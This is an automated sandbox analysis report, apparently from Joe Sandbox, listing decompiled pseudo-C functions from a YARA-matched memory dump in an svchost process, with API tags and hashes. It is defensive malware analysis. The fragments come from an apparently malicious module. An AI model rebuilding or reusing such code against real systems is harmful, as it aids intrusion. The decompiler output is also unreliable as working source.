                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF551AC0(long long __rbx, void* __rcx, long long _a8) {
                                                            				void* _t4;
                                                            				void* _t12;
                                                            
                                                            				_a8 = __rbx;
                                                            				GetCurrentThreadId();
                                                            				_t4 = E0000022B22BAF550C20(__rcx, __rcx, _t12);
                                                            				if (_t4 != 0) goto 0xaf551aec;
                                                            				return _t4;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Thread$CloseCurrentEventSwitchclosesocketsendshutdown
                                                            • String ID:
                                                            • API String ID: 2870165021-0
                                                            • Opcode ID: acfcbb5f787d251adaf38a9cca9f19412a7264b3d5163f623e0271512663ae76
                                                            • Instruction ID: 83b798d9270ccb17a09b5d186515dd3061d3f8ff8879e6d346aa31637b820d8f
                                                            • Opcode Fuzzy Hash: acfcbb5f787d251adaf38a9cca9f19412a7264b3d5163f623e0271512663ae76
                                                            • Instruction Fuzzy Hash: 69216073600A0192EB269FB6E45C29C37B0F788FA4F555321CA2A477EADF35C885C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0000022B22BAF57788C(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				signed int _t27;
                                                            				signed int _t28;
                                                            				signed int _t29;
                                                            				signed int _t30;
                                                            				signed int _t31;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t45;
                                                            				signed int _t47;
                                                            				void* _t52;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t27 = __ecx & 0x0000001f;
                                                            				if ((__ecx & 0x00000008) == 0) goto 0xaf5778bd;
                                                            				if (__edx >= 0) goto 0xaf5778bd;
                                                            				E0000022B22BAF578010(_t27, _t52);
                                                            				_t28 = _t27 & 0xfffffff7;
                                                            				goto 0xaf577914;
                                                            				_t43 = 0x00000004 & dil;
                                                            				if (_t43 == 0) goto 0xaf5778d8;
                                                            				asm("dec eax");
                                                            				if (_t43 >= 0) goto 0xaf5778d8;
                                                            				E0000022B22BAF578010(_t28, _t52);
                                                            				_t29 = _t28 & 0xfffffffb;
                                                            				goto 0xaf577914;
                                                            				_t44 = dil & 0x00000001;
                                                            				if (_t44 == 0) goto 0xaf5778f4;
                                                            				asm("dec eax");
                                                            				if (_t44 >= 0) goto 0xaf5778f4;
                                                            				E0000022B22BAF578010(_t29, _t52);
                                                            				_t30 = _t29 & 0xfffffffe;
                                                            				goto 0xaf577914;
                                                            				_t45 = dil & 0x00000002;
                                                            				if (_t45 == 0) goto 0xaf577914;
                                                            				asm("dec eax");
                                                            				if (_t45 >= 0) goto 0xaf577914;
                                                            				if ((dil & 0x00000010) == 0) goto 0xaf577911;
                                                            				E0000022B22BAF578010(_t30, _t52);
                                                            				_t31 = _t30 & 0xfffffffd;
                                                            				_t47 = dil & 0x00000010;
                                                            				if (_t47 == 0) goto 0xaf57792e;
                                                            				asm("dec eax");
                                                            				if (_t47 >= 0) goto 0xaf57792e;
                                                            				E0000022B22BAF578010(_t31, _t52);
                                                            				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                            • Instruction ID: f4cb4fe58d665fce273cc7466ccb026525dcd7911c1c366c127e20d118f1c0c2
                                                            • Opcode Fuzzy Hash: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                            • Instruction Fuzzy Hash: F0110C77A2060127FF7A11E8F48E3F93B417B5A3F0F294E64A9B6066E7DF1A84409211
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: setsockopt$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1564866530-0
                                                            • Opcode ID: 648e4d95653bdd450a4785caf3a97a83d97195326a6c88ef1a596a3f2b6fddef
                                                            • Instruction ID: 651f81d705d15870a6af0d74be6c09fc1beac695a07ff528573674905b82f8b4
                                                            • Opcode Fuzzy Hash: 648e4d95653bdd450a4785caf3a97a83d97195326a6c88ef1a596a3f2b6fddef
                                                            • Instruction Fuzzy Hash: FF214F72214A86E6FB718FA0E55C39A77A1FB84754F500625FB8A06ADACF3EC5048B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 89c8223d4217928e17653a7c4d546915ced36afa6922e5df3d775de8e12a9e46
                                                            • Instruction ID: 85053fa779f54081f723727c89e67c844f16f0cd5be2ac4dd532e1ef531f5156
                                                            • Opcode Fuzzy Hash: 89c8223d4217928e17653a7c4d546915ced36afa6922e5df3d775de8e12a9e46
                                                            • Instruction Fuzzy Hash: C6015A23721749A1FE7AA6E9D06D3ED33919704BA4F241B148A7D467D3EF6AC4C14280
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E0000022B22BAF540000(int __ebx, void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, void* __r9, void* __r14, void* __r15, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rsi;
                                                            				int _t15;
                                                            				int _t18;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				char* _t28;
                                                            				long long _t45;
                                                            				void* _t53;
                                                            
                                                            				_t53 = __r8;
                                                            				_t28 = __rax;
                                                            				_t18 = __ebx;
                                                            				_a24 = __rbp;
                                                            				E0000022B22BAF53F750(_t45, __r9, __r14, __r15);
                                                            				if (_t28 == 0) goto 0xaf54008a;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rdi;
                                                            				LocalSize(??);
                                                            				LocalAlloc(??, ??);
                                                            				r8d = _t18;
                                                            				_t5 = _t28 + 1; // 0x1
                                                            				 *_t28 = 0x8e;
                                                            				E0000022B22BAF562BA0(0x40, _t23, _t24, _t25, _t5, _t28, _t28, _t28, _t53);
                                                            				LocalFree(??);
                                                            				_t15 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t15;
                                                            				E0000022B22BAF531FF0(_a8, _t28);
                                                            				return LocalFree(??);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: 8783259af32ba0c14d0cf9032549750ec9e1864db2890626efa726ac833c9638
                                                            • Instruction ID: 6af906d92bf711cc6a0aee0da1735f6ef7f2bd6c1c094b51abf7280552b0a2d1
                                                            • Opcode Fuzzy Hash: 8783259af32ba0c14d0cf9032549750ec9e1864db2890626efa726ac833c9638
                                                            • Instruction Fuzzy Hash: EA017526215A40A2EE11AF96E45C2EEB7A1EB89FD0F084514DF4907B5BDF3EC0458780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0000022B22BAF5400A0(int __ebx, void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, void* __r9, void* __r14, void* __r15, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rsi;
                                                            				int _t15;
                                                            				int _t18;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				char* _t28;
                                                            				long long _t29;
                                                            				long long _t45;
                                                            				void* _t53;
                                                            
                                                            				_t53 = __r8;
                                                            				_t29 = __rbx;
                                                            				_t28 = __rax;
                                                            				_t18 = __ebx;
                                                            				_a24 = __rbp;
                                                            				E0000022B22BAF53FC50(__rbx, _t45, __r9, __r14, __r15);
                                                            				if (_t28 == 0) goto 0xaf54012a;
                                                            				_a8 = _t29;
                                                            				_a16 = __rdi;
                                                            				LocalSize(??);
                                                            				LocalAlloc(??, ??);
                                                            				r8d = _t18;
                                                            				_t5 = _t28 + 1; // 0x1
                                                            				 *_t28 = 0x8e;
                                                            				E0000022B22BAF562BA0(0x40, _t23, _t24, _t25, _t5, _t28, _t28, _t28, _t53);
                                                            				LocalFree(??);
                                                            				_t15 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t15;
                                                            				E0000022B22BAF531FF0(_a8, _t28);
                                                            				return LocalFree(??);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: 616f164c407fe861dd4db3285f6b11ddd2fe77cb04e9f0e82758d3ec9b6edb57
                                                            • Instruction ID: fc2b210dd981c1046cf8dcddd2d1690dbf223f31c8e05a00ff5c198525705069
                                                            • Opcode Fuzzy Hash: 616f164c407fe861dd4db3285f6b11ddd2fe77cb04e9f0e82758d3ec9b6edb57
                                                            • Instruction Fuzzy Hash: 73017526215A44A2EE11AF96E45C2EEB7A1EB89FD0F084514DF4907B5BDF3EC0468780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                            • String ID:
                                                            • API String ID: 2068333509-0
                                                            • Opcode ID: 78de20b501988cc7dda47b26bd3e50bf554e57992cdc6d61acfbe56b35ce1513
                                                            • Instruction ID: ac9302e19ae31ee5290d78da8bd957d49370e09dd097b031535d308d4651d5cd
                                                            • Opcode Fuzzy Hash: 78de20b501988cc7dda47b26bd3e50bf554e57992cdc6d61acfbe56b35ce1513
                                                            • Instruction Fuzzy Hash: 0F014432715B40A2EF769BA1F85D7EA73A0F78CB81F440421DA5A47756DF3DC0558740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF542B60(signed int __edx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, signed int __r8, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t30;
                                                            				intOrPtr* _t41;
                                                            				long long* _t42;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr* _t48;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            				intOrPtr* _t60;
                                                            
                                                            				if (__r8 - 0xffffffff > 0) goto 0xaf542baf;
                                                            				if (__r8 * 8 - 0x1000 < 0) goto 0xaf542ba3;
                                                            				if ((__edx & 0x0000001f) != 0) goto 0xaf542bb5;
                                                            				_t41 =  *((intOrPtr*)(__rdx - 8));
                                                            				if (_t41 - __rdx >= 0) goto 0xaf542bbb;
                                                            				_t54 = __rdx - _t41;
                                                            				if (_t54 - 8 < 0) goto 0xaf542bc1;
                                                            				if (_t54 - 0x27 > 0) goto 0xaf542bc7;
                                                            				_t55 = _t41;
                                                            				_t47 = _t41;
                                                            				goto 0xaf55a85c;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_a16 = __rbp;
                                                            				_a24 = __rsi;
                                                            				_t57 = _t47 + 0x128;
                                                            				_t42 =  *((intOrPtr*)(_t57 + 8));
                                                            				_t60 = _t47;
                                                            				_t48 =  *_t42;
                                                            				 *_t42 = _t42;
                                                            				 *((long long*)( *((intOrPtr*)(_t57 + 8)) + 8)) =  *((intOrPtr*)(_t57 + 8));
                                                            				 *((long long*)(_t57 + 0x10)) = __rbp;
                                                            				if (_t48 ==  *((intOrPtr*)(_t57 + 8))) goto 0xaf542c26;
                                                            				_a8 = __rbx;
                                                            				0xaf55a85c(_t56);
                                                            				if ( *_t48 !=  *((intOrPtr*)(_t57 + 8))) goto 0xaf542c10;
                                                            				0xaf542cf0();
                                                            				E0000022B22BAF564114(_t26, 8, _t30, _a8, _t55, _t60, __r8);
                                                            				_t25 = E0000022B22BAF564114(_t26, 8, _t30, _a8, _t55, _t60, __r8);
                                                            				 *((long long*)(_t60 + 8)) = __rbp;
                                                            				 *((long long*)(_t60 + 0x48)) = __rbp;
                                                            				 *_t60 = 0;
                                                            				 *((intOrPtr*)(_t60 + 0xc8)) = 0;
                                                            				 *((intOrPtr*)(_t60 + 0x88)) = 0;
                                                            				return _t25;
                                                            			}


                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 99a0b68018c0cd2454a0d70707031a19c663b083c8a7e1fd5ec40d5a9b9773d8
                                                            • Instruction ID: 905e63f6a12806c331347deb263ffcad97efab3eea1b65c503f27a2de2d68627
                                                            • Opcode Fuzzy Hash: 99a0b68018c0cd2454a0d70707031a19c663b083c8a7e1fd5ec40d5a9b9773d8
                                                            • Instruction Fuzzy Hash: 68F03A6A71125A25F87E3AD1844E3DD335243057E2E544F14567806ED7EF6640C00281
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF54B020(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* _a8, long long _a16, void* _a48, void* _a56) {
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				void* _t16;
                                                            				intOrPtr* _t37;
                                                            				intOrPtr _t46;
                                                            				long long _t50;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				if (__rdx == 0) goto 0xaf54b097;
                                                            				_t46 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b04c;
                                                            				goto 0xaf54b04f;
                                                            				if (__rdx - __rcx < 0) goto 0xaf54b097;
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b05d;
                                                            				if ( *__rcx +  *((intOrPtr*)(__rcx + 0x10)) - __rdx <= 0) goto 0xaf54b097;
                                                            				if (_t46 - 0x10 < 0) goto 0xaf54b071;
                                                            				goto 0xaf54b074;
                                                            				_t37 = _a8;
                                                            				_pop(_t50);
                                                            				goto 0xaf54b150;
                                                            				if (_t50 - 0xfffffffe > 0) goto 0xaf54b143;
                                                            				if ( *((intOrPtr*)(_t37 + 0x18)) - _t50 >= 0) goto 0xaf54b0c7;
                                                            				_t15 = E0000022B22BAF54B2D0(_t14, _t16, _t37, _t37, _t50,  *((intOrPtr*)(_t37 + 0x10)));
                                                            				if (_t50 == 0) goto 0xaf54b130;
                                                            				if ( *((long long*)(_t37 + 0x18)) - 0x10 < 0) goto 0xaf54b106;
                                                            				goto 0xaf54b109;
                                                            				if (_t50 != 0) goto 0xaf54b0bb;
                                                            				 *((long long*)(_t37 + 0x10)) = _t50;
                                                            				if ( *((long long*)(_t37 + 0x18)) - 0x10 < 0) goto 0xaf54b0f0;
                                                            				 *((intOrPtr*)( *_t37)) = dil;
                                                            				return _t15;
                                                            			}


                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 0-4289949731
                                                            • Opcode ID: 7d667a9bf3c03fc4f05e765795e3fe1c3f455e2aa4eb013ce9ef7e2083d4ad87
                                                            • Instruction ID: 870f360a349d25d224886e1bd7d2205e456b02d9c8e49ade7cdfe691c45c44ec
                                                            • Opcode Fuzzy Hash: 7d667a9bf3c03fc4f05e765795e3fe1c3f455e2aa4eb013ce9ef7e2083d4ad87
                                                            • Instruction Fuzzy Hash: 0B81B033A08A44B1EF2A8B99D54E39C7762E359FC9F540521CA2D07BDBDF36C5928340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0000022B22BAF56DB98(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
                                                            				void* _t73;
                                                            				unsigned int _t80;
                                                            				intOrPtr _t91;
                                                            				signed int _t97;
                                                            				signed int _t99;
                                                            				char _t101;
                                                            				signed int _t103;
                                                            				signed int _t105;
                                                            				unsigned int _t113;
                                                            				void* _t133;
                                                            				void* _t143;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rbp;
                                                            				_t133 = __rcx;
                                                            				if ( *((long long*)(__rcx + 0x468)) != 0) goto 0xaf56dbcc;
                                                            				_t73 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t73);
                                                            				goto 0xaf56dd76;
                                                            				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0xaf56dbb4;
                                                            				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0xaf56dd73;
                                                            				_t105 = __edi | 0xffffffff;
                                                            				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
                                                            				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
                                                            				goto 0xaf56dd4b;
                                                            				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                                                            				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0xaf56dd60;
                                                            				_t103 =  *(__rcx + 0x2c);
                                                            				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0xaf56dc26;
                                                            				_t128 =  *((char*)(__rcx + 0x41));
                                                            				goto 0xaf56dc28;
                                                            				_t80 = ( *( *((char*)(__rcx + 0x41)) + 0xaf581370) & 0x000000ff) >> 4;
                                                            				 *(__rcx + 0x2c) = _t80;
                                                            				if (_t80 == 8) goto 0xaf56dd86;
                                                            				_t113 = _t80;
                                                            				if (_t113 == 0) goto 0xaf56dd3f;
                                                            				if (_t113 == 0) goto 0xaf56dd26;
                                                            				if (_t113 == 0) goto 0xaf56dcf1;
                                                            				if (_t113 == 0) goto 0xaf56dcc5;
                                                            				if (_t113 == 0) goto 0xaf56dcbc;
                                                            				if (_t113 == 0) goto 0xaf56dc8f;
                                                            				if (_t113 == 0) goto 0xaf56dc82;
                                                            				if (_t80 - 0xfffffffffffffffc != 1) goto 0xaf56dd96;
                                                            				E0000022B22BAF56E024( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t143, 0xaf581370);
                                                            				goto 0xaf56dd47;
                                                            				E0000022B22BAF56DEA8(_t103, _t128, _t133);
                                                            				goto 0xaf56dd47;
                                                            				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0xaf56dca6;
                                                            				E0000022B22BAF56DB14(_t133, _t133, _t133 + 0x38);
                                                            				goto 0xaf56dd47;
                                                            				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                                                            				_t97 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                                                            				_t98 =  <  ? _t105 : _t97;
                                                            				 *(_t133 + 0x38) =  <  ? _t105 : _t97;
                                                            				goto 0xaf56dced;
                                                            				 *(_t133 + 0x38) =  *(_t133 + 0x38) & 0x00000000;
                                                            				goto 0xaf56dd4b;
                                                            				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0xaf56dcd1;
                                                            				goto 0xaf56dc99;
                                                            				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                                                            				_t99 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                                                            				 *(_t133 + 0x34) = _t99;
                                                            				if (_t99 >= 0) goto 0xaf56dced;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                                                            				 *(_t133 + 0x34) =  ~_t99;
                                                            				goto 0xaf56dd47;
                                                            				_t91 =  *((intOrPtr*)(_t133 + 0x41));
                                                            				if (_t91 == 0x20) goto 0xaf56dd20;
                                                            				if (_t91 == 0x23) goto 0xaf56dd1a;
                                                            				if (_t91 == 0x2b) goto 0xaf56dd14;
                                                            				if (_t91 == 0x2d) goto 0xaf56dd0e;
                                                            				if (_t91 != 0x30) goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
                                                            				goto 0xaf56dd4b;
                                                            				 *(_t133 + 0x34) =  *(_t133 + 0x34) & 0x00000000;
                                                            				 *(_t133 + 0x30) =  *(_t133 + 0x30) & 0x00000000;
                                                            				 *(_t133 + 0x3c) =  *(_t133 + 0x3c) & 0x00000000;
                                                            				 *((char*)(_t133 + 0x40)) = 0;
                                                            				 *(_t133 + 0x38) = _t105;
                                                            				 *((char*)(_t133 + 0x54)) = 0;
                                                            				goto 0xaf56dd4b;
                                                            				if (E0000022B22BAF56DD9C(_t133) == 0) goto 0xaf56dd96;
                                                            				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
                                                            				 *((char*)(_t133 + 0x41)) = _t101;
                                                            				if (_t101 != 0) goto 0xaf56dbfd;
                                                            				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
                                                            				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
                                                            				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0xaf56dbf0;
                                                            				return  *((intOrPtr*)(_t133 + 0x28));
                                                            			}

                                                            0x22baf56dd1e
                                                            0x22baf56dd20
                                                            0x22baf56dd24
                                                            0x22baf56dd26
                                                            0x22baf56dd2a
                                                            0x22baf56dd2e
                                                            0x22baf56dd32
                                                            0x22baf56dd36
                                                            0x22baf56dd39
                                                            0x22baf56dd3d
                                                            0x22baf56dd49
                                                            0x22baf56dd4f
                                                            0x22baf56dd51
                                                            0x22baf56dd56
                                                            0x22baf56dd5c
                                                            0x22baf56dd60
                                                            0x22baf56dd6d
                                                            0x22baf56dd85

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: e3d09414eb3035d096de30692d95f155daf3eba0449976533a82440791860895
                                                            • Instruction ID: 57c182bdf3a4f857c7c0474f135e02a65cbaf1ef2e5070db557a03017731b923
                                                            • Opcode Fuzzy Hash: e3d09414eb3035d096de30692d95f155daf3eba0449976533a82440791860895
                                                            • Instruction Fuzzy Hash: A6513073124644AAF7FA9EE8805C3AC3BB1E356B18F1C1A15C6664A2DBCF76C481DE41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53AC60(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t43;
                                                            				signed long long _t52;
                                                            				long long _t71;
                                                            				void* _t74;
                                                            				signed int* _t75;
                                                            				void* _t77;
                                                            				signed long long _t78;
                                                            
                                                            				_t71 = __rdi;
                                                            				_t43 = __ecx;
                                                            				 *((long long*)(_t77 + 0x18)) = __rbx;
                                                            				_t75 = _t77 - 0x10;
                                                            				_t78 = _t77 - 0x110;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t75 = _t52 ^ _t78;
                                                            				 *((long long*)(_t78 + 0x128)) = __rdi;
                                                            				E0000022B22BAF538B60(_t52 ^ _t78, __rbx, _t78 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t75 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t75 - 0x60)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t75 - 0x50)) = _t71;
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((intOrPtr*)(_t75 - 0x3c)) = 0;
                                                            				 *((long long*)(_t75 - 0x78)) = _t71;
                                                            				 *((long long*)(_t75 - 0x70)) = _t71;
                                                            				 *((long long*)(_t75 - 0x48)) = _t71;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t75 - 0x38)) = _t71;
                                                            				if (( *(_t75 - 0x10) & 0x0000ffff) != 1) goto 0xaf53ad94;
                                                            				 *((short*)(_t78 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t78 + 0x20)) = _t71;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78))))))(_t74) != 0) goto 0xaf53adfd;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t78 + 0x50);
                                                            				if ( *((intOrPtr*)(_t75 - 0x28)) == 0) goto 0xaf53ad3e;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78)))),  *((intOrPtr*)(_t75 - 0x28)));
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t75 - 0x80)) == 0) goto 0xaf53ad75;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t75 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(_t43, 0xaf588790,  *_t75 ^ _t78);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
